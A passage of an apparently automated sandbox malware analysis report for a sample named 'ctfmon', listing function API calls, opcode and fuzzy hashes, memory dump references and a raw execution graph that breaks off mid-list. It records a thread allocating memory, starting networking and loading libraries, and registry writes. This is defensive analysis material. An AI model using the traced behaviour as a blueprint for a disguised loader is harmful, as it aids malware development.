        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Color$LongObjectTextWindow
        • String ID:
        • API String ID: 2871169696-0
        • Opcode ID: 6bfb09690fe84eba5d4a453ecea5fb5c85d8c0aed8a45764c685c94329dbecce
        • Instruction ID: 996a509eb5483e03d1280d7cc741f4f8e1f151524dd7178acde86eebcbf6a08c
        • Opcode Fuzzy Hash: 6bfb09690fe84eba5d4a453ecea5fb5c85d8c0aed8a45764c685c94329dbecce
        • Instruction Fuzzy Hash: 13011E30600155AEDF21AF54EC45AAE3BF5AB00342F944522FA02C91A0CB78CE91D69A
        APIs
        • GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 004265F7
        • GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 00426604
        • MulDiv.KERNEL32(?,00000000,00000000), ref: 00426629
        • MulDiv.KERNEL32(00000002,00000000,00000000), ref: 00426644
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ViewportWindow
        • String ID:
        • API String ID: 1589084482-0
        • Opcode ID: ec1b5b6817ca1c2ebd15a418b255d379ad3acd19b180bc92750e106462dc6494
        • Instruction ID: 5e34c4cd6609403dc149269c458482475ccf921670738db4690db06b0d034127
        • Opcode Fuzzy Hash: ec1b5b6817ca1c2ebd15a418b255d379ad3acd19b180bc92750e106462dc6494
        • Instruction Fuzzy Hash: D3F01D72400108FFEB156BA2EC05CBEBBBDEF90314754487AF851A3170DB726D619B94
        APIs
        • lstrlenW.KERNEL32(?), ref: 00426A47
        • GetWindowTextW.USER32(?,?,00000100), ref: 00426A63
        • lstrcmpW.KERNEL32(?,?), ref: 00426A77
        • SetWindowTextW.USER32(?,?), ref: 00426A87
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: TextWindow$lstrcmplstrlen
        • String ID:
        • API String ID: 330964273-0
        • Opcode ID: a6feacd7a93c21d4b63f93107cf599a94417fa541fe100134905ebe0f2e2f2c7
        • Instruction ID: c0d20ed1f89d7020bcb479a82dbdd8d31feb51cd73047c170cfc194cd6cd2529
        • Opcode Fuzzy Hash: a6feacd7a93c21d4b63f93107cf599a94417fa541fe100134905ebe0f2e2f2c7
        • Instruction Fuzzy Hash: D4F01235A00129BBDF216F64EC88ADE7B69FB05390F448161F819E1160EB35DD568B98
        APIs
        • GetTickCount.KERNEL32 ref: 00429554
        • GetTickCount.KERNEL32 ref: 00429561
        • CoFreeUnusedLibraries.OLE32 ref: 00429570
        • GetTickCount.KERNEL32 ref: 00429576
          • Part of subcall function 004294D7: CoFreeUnusedLibraries.OLE32 ref: 0042951F
          • Part of subcall function 004294D7: OleUninitialize.OLE32 ref: 00429525
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CountTick$FreeLibrariesUnused$Uninitialize
        • String ID:
        • API String ID: 685759847-0
        • Opcode ID: bba00209eca370fc7bdaf0e6fdc9f0432b36a18df8618614d61eea0a1e8516db
        • Instruction ID: 909b3d72e97e5b8f4fa77f634aeb50083d73612e72484a6c6d3d5ea4d5bcd909
        • Opcode Fuzzy Hash: bba00209eca370fc7bdaf0e6fdc9f0432b36a18df8618614d61eea0a1e8516db
        • Instruction Fuzzy Hash: 60E01271E05125FBC711AF60FD8865E37A0EB14311F905877D04192264C7785C85DF9D
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ClearH_prologVariant
        • String ID: @
        • API String ID: 1166855276-2766056989
        • Opcode ID: 96d336afb6ff769a2ec285c49e6639ad14dd0ac352727cf91911fbfca9445fcd
        • Instruction ID: b858331317e13cfe4e871a22f7291cb985bca7952d51c674c1c62d25b1df6737
        • Opcode Fuzzy Hash: 96d336afb6ff769a2ec285c49e6639ad14dd0ac352727cf91911fbfca9445fcd
        • Instruction Fuzzy Hash: 3C51A370E002199FDB14CFA9C888AEEB7F9FF48304F20856AE516E7251E774A906CF50
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Info
        • String ID: $
        • API String ID: 1807457897-3032137957
        • Opcode ID: 1ba185d3060239f3f9112fcedcc335b858bee9d5233abf8df5b3434db70f708b
        • Instruction ID: 80a56d3aed95c468bd87d356a319ccf427369d6e1cb2682b21b51dc1b754c7b8
        • Opcode Fuzzy Hash: 1ba185d3060239f3f9112fcedcc335b858bee9d5233abf8df5b3434db70f708b
        • Instruction Fuzzy Hash: 5741DF3280425C2EDB118714CDA9FFB7FA99B12740F1804FED585C7252CB294989D7AA
        APIs
        • IsChild.USER32(?,?), ref: 0040C704
        • GetWindowLongW.USER32(?,000000EC), ref: 0040C71B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ChildLongWindow
        • String ID: 0
        • API String ID: 1178903432-4108050209
        • Opcode ID: 51c1396d00b18aa145fec76cfe13e6a58820fd4ce7605e36329d660915a6127a
        • Instruction ID: 80f36ecc902128788ccff313db005aea39b01ff33b9cc0f7ff94248ddef8e30b
        • Opcode Fuzzy Hash: 51c1396d00b18aa145fec76cfe13e6a58820fd4ce7605e36329d660915a6127a
        • Instruction Fuzzy Hash: 1F218B22101206E6DB31AB358CC5B6B66589F507A5F241B3FBC06B32C2DB3DCD4199AC
        APIs
        • WideCharToMultiByte.KERNEL32(?,00000220,?,00407093,00000000,00000000,00000000,00000000,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415D8D
        • GetStringTypeA.KERNEL32(@,00000100,?,?,?,?,?,?,0040EBEE,?,00000008,00407093,?), ref: 00415DF8
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ByteCharMultiStringTypeWide
        • String ID: @
        • API String ID: 3139900361-216407459
        • Opcode ID: 0894872d51583d29e9f411928d0752d51c31d1bf5a6ee4355dc6dfac94347f61
        • Instruction ID: c75d9d2e149fe478884894de742f27978b31c81d622bbf0292b479ae06dd18f0
        • Opcode Fuzzy Hash: 0894872d51583d29e9f411928d0752d51c31d1bf5a6ee4355dc6dfac94347f61
        • Instruction Fuzzy Hash: 20217F31D0070AEBCF218F98EC459DEBBB5FF88314F20851AE55077290D3759A95DB54
        APIs
        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00416871,?), ref: 00416D5A
        • GetStringTypeW.KERNEL32(?,?,00000000,qhA,?,?,?,?,?,?,00416871,?), ref: 00416D6C
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ByteCharMultiStringTypeWide
        • String ID: qhA
        • API String ID: 3139900361-109923292
        • Opcode ID: 90facd2c636960555e395354108c39abe314cbde9bea42ad8a5fe578146252ea
        • Instruction ID: 89e0a92cda9d94ff151431ccce99fae9d9c15686a517ecb08ba51b8be8b920dd
        • Opcode Fuzzy Hash: 90facd2c636960555e395354108c39abe314cbde9bea42ad8a5fe578146252ea
        • Instruction Fuzzy Hash: ABF0FE32A01559EFCF218FD0ED859EEBF72FB04364F114625FA11611A0C7358961DB95
        APIs
        • GetClassNameA.USER32(?,?,00000010), ref: 0041DC8E
        • lstrcmpA.KERNEL32(?,ComboBox,?,00000010), ref: 0041DC9E
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: ClassNamelstrcmp
        • String ID: ComboBox
        • API String ID: 3770760073-1152790111
        • Opcode ID: 42d2bba44a04ed7f1c275f7866e4d06977ae23231fb73cfe7ca8ff7cb1aa41ff
        • Instruction ID: 49f8500e78018a632b0791ce0c797fe6f4d891fdbedeabdab1c9b0ad4b943904
        • Opcode Fuzzy Hash: 42d2bba44a04ed7f1c275f7866e4d06977ae23231fb73cfe7ca8ff7cb1aa41ff
        • Instruction Fuzzy Hash: D9E0DFB0B002006BD724AB248C49AAA32E8F754701FD40D5CF108C11A1FBBAD589CB9A
        APIs
        • EnterCriticalSection.KERNEL32(?), ref: 00428B70
        • LeaveCriticalSection.KERNEL32(?,?), ref: 00428B80
        • LocalFree.KERNEL32(?), ref: 00428B89
        • TlsSetValue.KERNEL32(?,00000000), ref: 00428B9F
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$EnterFreeLeaveLocalValue
        • String ID:
        • API String ID: 2949335588-0
        • Opcode ID: 7f312700d13023db20b8708b1166f6760c5c2e3e6c00427aca0f9f7ae2b7f223
        • Instruction ID: 44b9a5697ca3fe7116b24a0973f7addb02f1af333081b1e9ede574ef100a776b
        • Opcode Fuzzy Hash: 7f312700d13023db20b8708b1166f6760c5c2e3e6c00427aca0f9f7ae2b7f223
        • Instruction Fuzzy Hash: 13218931302220EFD7208F45E885B6E7BA4FF45712F50806EF5029B2A2CBB5F842CB58
        APIs
        • HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,004131B1,00000000,00000000,00000000,0040E198,00000000,00000000,?,00000000,00000000,00000000), ref: 00413411
        • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,004131B1,00000000,00000000,00000000,0040E198,00000000,00000000,?,00000000,00000000,00000000), ref: 00413445
        • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 0041345F
        • HeapFree.KERNEL32(00000000,?), ref: 00413476
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: AllocHeap$FreeVirtual
        • String ID:
        • API String ID: 3499195154-0
        • Opcode ID: fa750299313090193e105ebe2008919bf1dd0b0b930b10b5f1b3f69a44cfefeb
        • Instruction ID: c5f407516b639af01f7cf3b5c3ec23f839086e4030b11980835d7e942e3d2777
        • Opcode Fuzzy Hash: fa750299313090193e105ebe2008919bf1dd0b0b930b10b5f1b3f69a44cfefeb
        • Instruction Fuzzy Hash: 65118230600601DFD7318F69EC499567BB5FFA57157604A2AF1A1CA2B0C771A88EDF44
        APIs
        • EnterCriticalSection.KERNEL32(0053F3C8,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F74
        • InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F86
        • LeaveCriticalSection.KERNEL32(0053F3C8,?,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419), ref: 00428F8F
        • EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419,004203C5), ref: 00428FA1
          • Part of subcall function 00428EA6: GetVersion.KERNEL32(?,00428F49,?,00428CBB,00000010,?,00000000,?,?,?,00428413,Vht ,00427DD6,00428419,004203C5,0042601F), ref: 00428EB9
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalSection$Enter$InitializeLeaveVersion
        • String ID:
        • API String ID: 1193629340-0
        • Opcode ID: 7a3532099ff2bfc6a1059ac9601c8184679287ed949954b4d6ae466d6c0a7985
        • Instruction ID: 78c625607d6fa9dd441586049681e252a915402f59230de00c6089102d7b9ab4
        • Opcode Fuzzy Hash: 7a3532099ff2bfc6a1059ac9601c8184679287ed949954b4d6ae466d6c0a7985
        • Instruction Fuzzy Hash: 67F04471A0121ADFC7209F54FCC499AB76DFB24356B81043BE605D3221DB35A459DFA8
        APIs
        • InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412561
        • InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412569
        • InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412571
        • InitializeCriticalSection.KERNEL32(?,004101AE,?,0040D099), ref: 00412579
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: CriticalInitializeSection
        • String ID:
        • API String ID: 32694325-0
        • Opcode ID: eb9a2a7dc00640b2fa42e9378dbc490331b9edf8d292a26b3731d10b125d55d1
        • Instruction ID: c31dbd3ccd9fd40a20c5e7c4c7202aa3fbdad9c40b9ff82e0d969961f7efeac2
        • Opcode Fuzzy Hash: eb9a2a7dc00640b2fa42e9378dbc490331b9edf8d292a26b3731d10b125d55d1
        • Instruction Fuzzy Hash: A4C04031901074DBCF533B65FD4784D3FA6EF052603012273E144514308AB11D21DFC8

        Execution Graph

        Execution Coverage:5.7%
        Dynamic/Decrypted Code Coverage:0%
        Signature Coverage:0%
        Total number of Nodes:2000
        Total number of Limit Nodes:33
        execution_graph 18656 401240 18673 42159f 18656->18673 18658 40125f GetSystemMenu 18691 424bd3 18658->18691 18661 4012d6 SendMessageW SendMessageW 18696 404620 GetCommandLineA 18661->18696 18666 4012c5 18731 424739 18666->18731 18667 40129f AppendMenuW AppendMenuW 18667->18666 18674 4215b1 18673->18674 18675 4215a9 18673->18675 18745 423aa1 18674->18745 18736 423af1 18675->18736 18678 4215af 18679 4215cc 18678->18679 18754 423830 18678->18754 18758 42147a 18679->18758 18683 4215d5 18683->18658 18684 4215d9 18761 4241a5 18684->18761 18687 4215ff 18687->18658 19140 424b61 18691->19140 18693 424bda 18694 424f58 30 API calls 18693->18694 18695 401271 18694->18695 18695->18661 18720 424ab5 18695->18720 19148 4248ad 18696->19148 18701 4047aa 18701->18701 18702 4047bb RegOpenKeyExA GetLastError 18701->18702 18703 4047f3 RegQueryValueExA 18702->18703 18704 4047e3 18702->18704 18705 404838 18703->18705 18706 40481b 18703->18706 18708 424739 ctype 32 API calls 18704->18708 18707 404873 RegSetValueExA 18705->18707 18710 404899 RegCloseKey 18705->18710 18706->18705 18709 404820 RegCloseKey 18706->18709 18707->18710 18711 401303 18708->18711 18709->18704 18710->18704 18712 424236 18711->18712 18713 424240 18712->18713 18715 401316 18712->18715 19213 4218e7 18713->19213 18716 424319 18715->18716 18717 424323 SetWindowPos 18716->18717 18719 40132c CreateThread 18716->18719 18717->18719 19243 4014b0 VirtualAlloc WSAStartup LoadLibraryW 18719->19243 19220 424b39 18720->19220 18723 424ae3 19224 424886 18723->19224 18724 424afb 18728 424b39 29 API calls 18724->18728 18729 424b21 18724->18729 19229 4249e6 18724->19229 18727 401294 18727->18666 18727->18667 18728->18724 18730 424a36 35 API calls 18729->18730 18730->18727 18732 424761 18731->18732 18733 424749 InterlockedDecrement 18731->18733 18732->18661 18733->18732 18734 424757 18733->18734 18735 424625 ctype 31 API calls 18734->18735 18735->18732 18737 423be9 18736->18737 18740 423b13 18736->18740 18739 423bff 18737->18739 18775 42317f GetTopWindow 18737->18775 18739->18678 18740->18737 18741 423b69 lstrlenA 18740->18741 18742 423b9c SendDlgItemMessageW 18740->18742 18743 423bc2 SendDlgItemMessageA 18740->18743 18744 423b80 MultiByteToWideChar 18740->18744 18741->18740 18742->18740 18743->18740 18744->18742 18746 423ae3 18745->18746 18747 423aae 18745->18747 18749 423af1 106 API calls 18746->18749 18748 4283ee ctype 28 API calls 18747->18748 18750 423ab3 FindResourceW 18748->18750 18751 423ad6 18749->18751 18750->18746 18752 423aca LoadResource 18750->18752 18751->18678 18752->18751 18753 423ada LockResource 18752->18753 18753->18746 18755 42383a __EH_prolog 18754->18755 19137 4281c1 18755->19137 18759 421483 18758->18759 18760 42148c EndDialog 18758->18760 18759->18760 18760->18683 18762 4215e5 18761->18762 18763 4241ac GetDlgItem 18761->18763 18762->18687 18765 421549 18762->18765 18764 421c35 58 API calls 18763->18764 18764->18762 18766 4283ee ctype 28 API calls 18765->18766 18767 421555 18766->18767 18768 405110 28 API calls 18767->18768 18771 42155c 18767->18771 18769 421565 18768->18769 18770 4283ee ctype 28 API calls 18769->18770 18769->18771 18770->18771 18772 424368 18771->18772 18773 42437e 18772->18773 18774 42436f ShowWindow 18772->18774 18773->18687 18774->18773 18776 42318f 18775->18776 18777 4231f6 18776->18777 18778 4231b9 SendMessageW 18776->18778 18780 4231eb GetWindow 18776->18780 18781 4231cf GetTopWindow 18776->18781 18783 42317f 98 API calls 18776->18783 18784 421c5c 18776->18784 18787 421a74 18776->18787 18777->18739 18778->18776 18780->18776 18781->18776 18781->18780 18783->18780 18797 421bc3 18784->18797 18786 421c63 ctype 18786->18776 18788 421a7e __EH_prolog 18787->18788 18789 428c05 ctype 21 API calls 18788->18789 18790 421a96 18789->18790 18791 421af3 18790->18791 18995 421901 GetWindowRect 18790->18995 18998 422931 18791->18998 18795 421b1c 18795->18776 18798 421bcd __EH_prolog 18797->18798 18805 428414 18798->18805 18800 421bd3 ctype 18803 421c11 ctype 18800->18803 18810 420e3f 18800->18810 18803->18786 18818 4283ee 18805->18818 18812 420e45 18810->18812 18813 420e63 18812->18813 18894 40e10c 18812->18894 18813->18803 18814 424ef3 18813->18814 18815 424efd __EH_prolog ctype 18814->18815 18953 41ff6a 18815->18953 18817 424f34 18817->18803 18819 428c05 ctype 21 API calls 18818->18819 18820 4283fd 18819->18820 18821 428413 18820->18821 18834 428c9a 18820->18834 18823 428c05 18821->18823 18824 428c3b TlsGetValue 18823->18824 18825 428c0e 18823->18825 18826 428c4e 18824->18826 18827 428c28 18825->18827 18857 428805 TlsAlloc 18825->18857 18831 428c61 18826->18831 18832 42842a 18826->18832 18861 42889e EnterCriticalSection 18827->18861 18830 428c39 18830->18824 18871 428a0d TlsGetValue 18831->18871 18832->18800 18835 428ca4 __EH_prolog 18834->18835 18836 428cd2 18835->18836 18840 428f39 18835->18840 18836->18821 18841 428f44 18840->18841 18842 428f49 18840->18842 18852 428ea6 18841->18852 18844 428cbb 18842->18844 18845 428f96 EnterCriticalSection 18842->18845 18846 428f6d EnterCriticalSection 18842->18846 18849 428fa9 18844->18849 18845->18844 18847 428f7b InitializeCriticalSection 18846->18847 18848 428f8e LeaveCriticalSection 18846->18848 18847->18848 18848->18845 18850 428fb2 LeaveCriticalSection 18849->18850 18851 428fc7 18849->18851 18850->18851 18851->18836 18853 428eb0 GetVersion 18852->18853 18854 428eca 18852->18854 18855 428ed2 InitializeCriticalSection 18853->18855 18856 428ec3 18853->18856 18854->18842 18855->18854 18856->18854 18856->18855 18858 428834 18857->18858 18859 428839 InitializeCriticalSection 18857->18859 18886 41fa5f 18858->18886 18859->18827 18862 4288bd 18861->18862 18864 4288f7 GlobalAlloc 18862->18864 18865 42890a GlobalHandle GlobalUnlock GlobalReAlloc 18862->18865 18870 428979 ctype 18862->18870 18863 42898e LeaveCriticalSection 18863->18830 18866 42892c 18864->18866 18865->18866 18867 428955 GlobalLock 18866->18867 18868 42893a GlobalHandle GlobalLock LeaveCriticalSection 18866->18868 18867->18870 18869 41fa5f ctype RaiseException 18868->18869 18869->18867 18870->18863 18872 428a3e 18871->18872 18876 428a24 18871->18876 18889 4287d3 LocalAlloc 18872->18889 18873 428ae4 18873->18832 18876->18873 18877 428a87 LocalAlloc 18876->18877 18878 428a98 LocalReAlloc 18876->18878 18881 428aa8 18877->18881 18878->18881 18883 428ab4 ctype 18881->18883 18884 41fa5f ctype RaiseException 18881->18884 18882 